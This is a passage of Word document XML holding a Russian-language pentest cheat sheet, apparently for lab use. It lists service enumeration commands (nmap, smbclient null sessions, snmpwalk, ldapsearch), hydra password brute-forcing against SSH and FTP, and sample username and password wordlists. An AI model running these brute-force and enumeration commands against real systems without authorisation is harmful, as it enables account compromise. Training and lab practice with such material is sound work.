        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Определяет SSH и запускает стандартные NSE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>ssh2-enum-algos — алгоритмы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>ssh USER@$TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Подключение по SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>ssh -i KEY USER@TARGET — ключ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>hydra -l USER -P passwords-small.txt ssh://$TARGET -t 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Перебор паролей для одного пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Для стенда; сначала маленький список.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.2 FTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>nmap -sC -sV -p21 $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Определяет FTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>--script ftp-anon — проверка anonymous.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>ftp $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>FTP-клиент.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Проверь anonymous, если это предусмотрено.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>hydra -L users.txt -P passwords-small.txt ftp://$TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Перебор FTP credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Сначала ограниченный список.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.3 SMB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>enum4linux-ng $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Собирает домен/пользователей/shares и другую SMB-информацию.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Особенно полезно на 139/445.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>smbclient -L //$TARGET -N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Показывает шары через null session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Если запрещено — получишь отказ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>smbclient //$TARGET/SHARE -N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Подключается к шару без пароля.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>-U USER — с учётными данными.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>smbmap -H $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Показывает shares и права.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>-u USER -p PASS — с credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>11. SNMP / LDAP / DB / RDP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.1 SNMP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>sudo nmap -sU -p161 --script snmp-info $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Проверяет SNMP-информацию.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>UDP-сканирование медленнее TCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>snmpwalk -v2c -c public $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Получает SNMP-дерево при community public.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Проверяй community из задания/стенда.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>onesixtyone $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Быстро проверяет community strings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>onesixtyone -c communities.txt TARGET.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.2 LDAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://$TARGET -s base</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Пробует получить базовую LDAP-информацию.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Если известен DN — добавь -b.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://$TARGET -b 'dc=example,dc=local'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Ищет объекты LDAP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>DN заменяй на найденный.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.3 MySQL/PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>nmap -sC -sV -p3306 $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Определяет MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Сначала версия, затем найденные credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>mysql -h $TARGET -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Подключение к MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Используй после получения/проверки credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>nmap -sC -sV -p5432 $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Определяет PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Проверь также нестандартные порты.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>psql -h $TARGET -U postgres</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Подключение к PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Добавь -d DBNAME.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.4 RDP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>nmap -sV -p3389 $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Определяет RDP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>rdp-enum-encryption — параметры шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>xfreerdp /v:$TARGET /u:USER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>RDP с запросом пароля.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>/p:'PASSWORD' — если пароль известен.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>12. Wordlists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</w:tcPr>
          <w:p>
            <w:r>
              <w:t>Приоритет</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Список</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Когда</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Default/common credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Сразу</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Top 100/1000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Быстрый тест</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Target-specific</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Название компании/проекта/FQDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SecLists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Специализированные списки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>RockYou</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Когда перебор оправдан условиями задачи</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ls /usr/share/seclists/Passwords/</w:t>
        <w:br/>
        <w:t>ls /usr/share/seclists/Usernames/</w:t>
        <w:br/>
        <w:t>ls /usr/share/seclists/Discovery/Web-Content/</w:t>
        <w:br/>
        <w:t>ls /usr/share/seclists/Discovery/DNS/</w:t>
        <w:br/>
        <w:t>ls /usr/share/wordlists/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>cewl http://$TARGET -w company_words.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Создаёт слова из доступного сайта.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>cewl -d 2 -m 5 URL -w words.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>crunch 8 8 abc123 -o custom.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Генерирует комбинации заданной длины.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Используй только при известной структуре пароля — размер списка быстро растёт.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># users.txt</w:t>
        <w:br/>
        <w:t>root</w:t>
        <w:br/>
        <w:t>admin</w:t>
        <w:br/>
        <w:t>administrator</w:t>
        <w:br/>
        <w:t>user</w:t>
        <w:br/>
        <w:t>test</w:t>
        <w:br/>
        <w:t>dev</w:t>
        <w:br/>
        <w:t>developer</w:t>
        <w:br/>
        <w:t>operator</w:t>
        <w:br/>
        <w:br/>
        <w:t># passwords-small.txt</w:t>
        <w:br/>
        <w:t>password</w:t>
        <w:br/>
        <w:t>Password</w:t>
        <w:br/>
        <w:t>123456</w:t>
        <w:br/>
        <w:t>12345678</w:t>
        <w:br/>
        <w:t>admin</w:t>
        <w:br/>
        <w:t>admin123</w:t>
        <w:br/>
        <w:t>qwerty</w:t>
        <w:br/>
        <w:t>qwerty123</w:t>
        <w:br/>
        <w:t>letmein</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>13. Password attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Порядок: default → small list → target-specific → специализированный список → большой список.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>hydra -l admin -P passwords-small.txt ssh://$TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Проверяет один логин с набором паролей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>FTP: ftp://TARGET; HTTP — только после определения точной формы/параметров.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>hydra -L users.txt -P passwords-small.txt ssh://$TARGET -t 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Перебирает users × passwords с ограниченной параллельностью.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Снижай -t на нестабильном сервисе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
